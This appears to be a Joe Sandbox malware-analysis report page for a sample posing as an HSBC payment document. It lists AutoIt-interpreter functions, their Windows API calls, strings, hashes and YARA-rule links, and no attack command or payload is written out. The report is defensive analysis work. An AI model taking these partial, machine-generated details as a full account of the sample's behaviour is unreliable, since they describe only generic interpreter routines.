Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: cc09d91c90cedf6dd0ccb50dcb20711daf7a26d86f7f96f682e018f6112c0c8d
Instruction ID: 10429a34d2b81c898435fa8fe0c988d42e4798a185ce70af6166a8e0baa99aff
Opcode Fuzzy Hash: cc09d91c90cedf6dd0ccb50dcb20711daf7a26d86f7f96f682e018f6112c0c8d
Instruction Fuzzy Hash: 06D05E322A050EABEF018EA4DC01EAF3B69EB04B01F40C111FE15C50A1C775D835AB60

Function 0074A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 0074A12A

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 3c3843e3f333c6b9f73fcd431c6c9f7278c73bd0eba47fadfe1d7e1c2f8fca62
Instruction ID: 2f31d8c3d7eee0a3ddab3ab245cf43c62dc35f10a735338e1466d5056bec0d23
Opcode Fuzzy Hash: 3c3843e3f333c6b9f73fcd431c6c9f7278c73bd0eba47fadfe1d7e1c2f8fca62
Instruction Fuzzy Hash: 0BA0113000020CAB8F002B82EC08888BFACEA822A0B008020F80C800228B32A8208A88

Function 00738808 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 213a49db3b7601736c0b597c79cd6f0537893a7b43b29aca2d51417f0252ad64
Instruction ID: 16e0b3f6c83c8454193998feedd2d62653c6ce76bed0dde7e2c4afc765dc493b
Opcode Fuzzy Hash: 213a49db3b7601736c0b597c79cd6f0537893a7b43b29aca2d51417f0252ad64
Instruction Fuzzy Hash: D122173060474ACBEF688B24C494B7C77B1BB41384F68C46BF55A8B593DBBCAD91C642

Function 007421C5 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 1a01f32eb7bde2dbf9c357015c88af719b4d9445eca493f0584b0d6ff00dc3b3
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: A1C1A7722050930ADF2D5639C43413EFBA15EA27B139A076DE8B3CB5D5EF28C976D620

Function 007425FA Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 59068c087e45201d1d7f5b5ca09c4944d077e8dd371a959fb98790163fabaf7a
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: BCC1B5722051930ADF2D563AC43403EFAA15EA27F139A076DE4B3DB4D5EF28C976D620

Function 00741978 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: ae344f97028eb6fa777aa952cbefb6adf4105dbeea1fedd1c97c8957d00f793c
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 67C1C37234519309DF2D6639C47413EBBA15EA27B139A076DD4B3CB5C4FF28C9A5CA20

Function 00797806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 0079785B
DeleteObject.GDI32(00000000), ref: 0079786D
DestroyWindow.USER32 ref: 0079787B
GetDesktopWindow.USER32 ref: 00797895
GetWindowRect.USER32(00000000), ref: 0079789C
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 007979DD
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 007979ED
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00797A35
GetClientRect.USER32(00000000,?), ref: 00797A41
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00797A7B
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00797A9D
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00797AB0
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00797ABB
GlobalLock.KERNEL32(00000000), ref: 00797AC4
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00797AD3
GlobalUnlock.KERNEL32(00000000), ref: 00797ADC
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00797AE3
GlobalFree.KERNEL32(00000000), ref: 00797AEE
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00797B00
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,007B2CAC,00000000), ref: 00797B16
GlobalFree.KERNEL32(00000000), ref: 00797B26
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00797B4C
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00797B6B
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00797B8D
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00797D7A

Strings

static, xrefs: 00797A75, 00797BCC
AutoIt v3, xrefs: 00797A2D
DISPLAY, xrefs: 00797BDD
, xrefs: 00797D00

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: a5e8ceed19fe3cba0e729b2d4182dfbd57ed04321088d3fa120218b538c4fef5
Instruction ID: b212dfe76cb710a8dc01c1b0f437651ed1a8181d1fd7fe652d7a14a9cba409a7
Opcode Fuzzy Hash: a5e8ceed19fe3cba0e729b2d4182dfbd57ed04321088d3fa120218b538c4fef5
Instruction Fuzzy Hash: 03025971A10119EFDF14DFA4EC89EAE7BB9FB49310F148158F915AB2A1C738AD01CB64

Function 007A356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,007AF910), ref: 007A3627
IsWindowVisible.USER32(?), ref: 007A364B

Strings

TABRIGHT, xrefs: 007A369D
FINDSTRING, xrefs: 007A3776
TABLEFT, xrefs: 007A3687
HIDEDROPDOWN, xrefs: 007A3700
GETCURRENTSELECTION, xrefs: 007A37E3
SELECTSTRING, xrefs: 007A3806
DELSTRING, xrefs: 007A3749
CURRENTTAB, xrefs: 007A36BD
GETSELECTED, xrefs: 007A38A3
GETCURRENTCOL, xrefs: 007A3928
GETLINECOUNT, xrefs: 007A38C6
SETCURRENTSELECTION, xrefs: 007A37B6
CHECK, xrefs: 007A386D
GETLINE, xrefs: 007A399B
ISVISIBLE, xrefs: 007A3637
GETCURRENTLINE, xrefs: 007A38ED
SENDCOMMANDID, xrefs: 007A39DA
ISENABLED, xrefs: 007A366B
SHOWDROPDOWN, xrefs: 007A36E0
ADDSTRING, xrefs: 007A3716
UNCHECK, xrefs: 007A3883
EDITPASTE, xrefs: 007A395F
ISCHECKED, xrefs: 007A3839

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: f10c1b5f5c3b8deccaa92c71412e480b50bd0cfcf5ea80aff9e3ae5e50f35283
Instruction ID: 3f2683d20b9925dda363d1692b9c2f2e35708b6b0e5703996003418f1ff9617b
Opcode Fuzzy Hash: f10c1b5f5c3b8deccaa92c71412e480b50bd0cfcf5ea80aff9e3ae5e50f35283
Instruction Fuzzy Hash: 1DD1B730204311DFCB04EF10C459A6E77A1AFD6394F188569F98A5B3A2DB3DEE09CB91

Function 007AA5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 007AA630
GetSysColorBrush.USER32(0000000F), ref: 007AA661
GetSysColor.USER32(0000000F), ref: 007AA66D
SetBkColor.GDI32(?,000000FF), ref: 007AA687
SelectObject.GDI32(?,00000000), ref: 007AA696
InflateRect.USER32(?,000000FF,000000FF), ref: 007AA6C1
GetSysColor.USER32(00000010), ref: 007AA6C9
CreateSolidBrush.GDI32(00000000), ref: 007AA6D0
FrameRect.USER32(?,?,00000000), ref: 007AA6DF
DeleteObject.GDI32(00000000), ref: 007AA6E6
InflateRect.USER32(?,000000FE,000000FE), ref: 007AA731
FillRect.USER32(?,?,00000000), ref: 007AA763
GetWindowLongW.USER32(?,000000F0), ref: 007AA78E

Part of subcall function 007AA8CA: GetSysColor.USER32(00000012), ref: 007AA903
Part of subcall function 007AA8CA: SetTextColor.GDI32(?,?), ref: 007AA907
Part of subcall function 007AA8CA: GetSysColorBrush.USER32(0000000F), ref: 007AA91D
Part of subcall function 007AA8CA: GetSysColor.USER32(0000000F), ref: 007AA928
Part of subcall function 007AA8CA: GetSysColor.USER32(00000011), ref: 007AA945
Part of subcall function 007AA8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 007AA953
Part of subcall function 007AA8CA: SelectObject.GDI32(?,00000000), ref: 007AA964
Part of subcall function 007AA8CA: SetBkColor.GDI32(?,00000000), ref: 007AA96D
Part of subcall function 007AA8CA: SelectObject.GDI32(?,?), ref: 007AA97A
Part of subcall function 007AA8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 007AA999
Part of subcall function 007AA8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007AA9B0
Part of subcall function 007AA8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 007AA9C5
Part of subcall function 007AA8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007AA9ED

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: d8348fa6eb058316e611cafa70059b33872affc905acef9f1601909e9fe9015d
Instruction ID: cbce1ed302d04d365f4d348dff7d3be3ef4dc7c7a327bf85d4b1e2e052d57c0c
Opcode Fuzzy Hash: d8348fa6eb058316e611cafa70059b33872affc905acef9f1601909e9fe9015d
Instruction Fuzzy Hash: 75918D72408305FFC7119FA4DC08A5B7BA9FFCA321F108B29F9A2961A0D739D944CB56

Function 007974AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 007974DE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0079759D
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 007975DB
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 007975ED
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00797633
GetClientRect.USER32(00000000,?), ref: 0079763F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00797683
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00797692
GetStockObject.GDI32(00000011), ref: 007976A2
SelectObject.GDI32(00000000,00000000), ref: 007976A6
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 007976B6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 007976BF
DeleteDC.GDI32(00000000), ref: 007976C8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 007976F4
SendMessageW.USER32(00000030,00000000,00000001), ref: 0079770B
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00797746
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0079775A
SendMessageW.USER32(00000404,00000001,00000000), ref: 0079776B
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0079779B
GetStockObject.GDI32(00000011), ref: 007977A6
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 007977B1
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 007977BB

Strings

static, xrefs: 0079767D, 00797795
AutoIt v3, xrefs: 0079762B
msctls_progress32, xrefs: 0079773C
DISPLAY, xrefs: 00797688

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 8a6cc6bd63c5715694add47cfec262b2568b9eff86550fb7986a6eb58cc7bc96
Instruction ID: 46804a8f5228c2821e6d9505aababacf556bf06c56fa99c54c4491f93231520f
Opcode Fuzzy Hash: 8a6cc6bd63c5715694add47cfec262b2568b9eff86550fb7986a6eb58cc7bc96
Instruction Fuzzy Hash: 6EA185B1A00619BFEB14DFA4DC4AFAE7779EB49714F048114FA14AB2E0D778AD00CB64

Function 0078AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0078AD1E
GetDriveTypeW.KERNEL32(?,007AFAC0,?,\\.\,007AF910), ref: 0078ADFB
SetErrorMode.KERNEL32(00000000,007AFAC0,?,\\.\,007AF910), ref: 0078AF59

Strings

SCSI, xrefs: 0078AEC6
ATA, xrefs: 0078AED4
Removable, xrefs: 0078AE4D
\\.\, xrefs: 0078AD70
ATAPI, xrefs: 0078AECD
FileBackedVirtual, xrefs: 0078AF28
SAS, xrefs: 0078AF05
PhysicalDrive, xrefs: 0078ADA7
SATA, xrefs: 0078AF0C
Fibre, xrefs: 0078AEE9
SSA, xrefs: 0078AEE2
1394, xrefs: 0078AEDB
Fixed, xrefs: 0078AE43
Unknown, xrefs: 0078AE1B, 0078AEBF
USB, xrefs: 0078AEF0
RAMDisk, xrefs: 0078AE25
Virtual, xrefs: 0078AF21
CDROM, xrefs: 0078AE2F
Network, xrefs: 0078AE39
MMC, xrefs: 0078AF1A
RAID, xrefs: 0078AEF7
SSD, xrefs: 0078AE86
iSCSI, xrefs: 0078AEFE

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: b1c27400e0bc270b99aa1046b1adda680e612c0fc1629edeac096b54d89ce657
Instruction ID: 392a452d84a919244cb15c6703156b750101c724564c44310baa423d4028738c
Opcode Fuzzy Hash: b1c27400e0bc270b99aa1046b1adda680e612c0fc1629edeac096b54d89ce657
Instruction Fuzzy Hash: 66519DF0688205FB9B50FB54C986CBD73B1EB49700B248457E606AB391DABCDD41DB53

Function 007268DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00726931
__wcsnicmp.LIBCMT ref: 00726949
__wcsnicmp.LIBCMT ref: 00726961
__wcsnicmp.LIBCMT ref: 00726979
__wcsnicmp.LIBCMT ref: 00726991
__wcsnicmp.LIBCMT ref: 007269A9
__wcsnicmp.LIBCMT ref: 007269C1
__wcsnicmp.LIBCMT ref: 007269D5
__wcsnicmp.LIBCMT ref: 00726A16
__wcsnicmp.LIBCMT ref: 00726A2A
__wcsnicmp.LIBCMT ref: 00726A3E
__wcsnicmp.LIBCMT ref: 00726A52

Strings

Cannot parse #include, xrefs: 0075E3F0
#requireadmin, xrefs: 0072695B
#ce, xrefs: 00726A4C
Bad directive syntax error, xrefs: 0075E31A
#notrayicon, xrefs: 00726943
#include-once, xrefs: 0072698B
Unterminated group of comments, xrefs: 0075E403
#pragma compile, xrefs: 0072692B
#comments-start, xrefs: 007269BB, 00726A10
#OnAutoItStartRegister, xrefs: 00726973
#include, xrefs: 007269A3
#comments-end, xrefs: 00726A38
#cs, xrefs: 007269CF, 00726A24

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 7d399035040a1fa863bc33e761180eac12e3e2d04606122253bb2a4502ac1c3e
Instruction ID: 6aa037dc51e6253abf1f4d1c8ed4884e741ce4d6d07f4ef5a7ba687136cf7946
Opcode Fuzzy Hash: 7d399035040a1fa863bc33e761180eac12e3e2d04606122253bb2a4502ac1c3e
Instruction Fuzzy Hash: 2B811AB1600225EACB15AB60EC86FEF3768EF05710F04402AFD496A196EB7DDE45C2A1

Function 007A9A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 007A9AD2
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 007A9B8B
SendMessageW.USER32(?,00001102,00000002,?), ref: 007A9BA7

Strings

0, xrefs: 007A9BE4

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: bdc295a2645f39a91f62a8695a58f75dccc4b48dd746fdf34a160f2d24d9cd85
Instruction ID: 4f74127706ee1762d9aecfc0323e32fa981cf1e45c3230a8c9c5c46378ccd2a5
Opcode Fuzzy Hash: bdc295a2645f39a91f62a8695a58f75dccc4b48dd746fdf34a160f2d24d9cd85
Instruction Fuzzy Hash: 9802C031109241AFDB25CF24C848BAABBE5FFCA314F04862DF695D62A1D73CD964CB52

Function 007AA8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 007AA903
SetTextColor.GDI32(?,?), ref: 007AA907
GetSysColorBrush.USER32(0000000F), ref: 007AA91D
GetSysColor.USER32(0000000F), ref: 007AA928
CreateSolidBrush.GDI32(?), ref: 007AA92D
GetSysColor.USER32(00000011), ref: 007AA945
CreatePen.GDI32(00000000,00000001,00743C00), ref: 007AA953
SelectObject.GDI32(?,00000000), ref: 007AA964
SetBkColor.GDI32(?,00000000), ref: 007AA96D
SelectObject.GDI32(?,?), ref: 007AA97A
InflateRect.USER32(?,000000FF,000000FF), ref: 007AA999
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007AA9B0
GetWindowLongW.USER32(00000000,000000F0), ref: 007AA9C5
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007AA9ED
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 007AAA14
InflateRect.USER32(?,000000FD,000000FD), ref: 007AAA32
DrawFocusRect.USER32(?,?), ref: 007AAA3D
GetSysColor.USER32(00000011), ref: 007AAA4B
SetTextColor.GDI32(?,00000000), ref: 007AAA53
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 007AAA67
SelectObject.GDI32(?,007AA5FA), ref: 007AAA7E
DeleteObject.GDI32(?), ref: 007AAA89
SelectObject.GDI32(?,?), ref: 007AAA8F
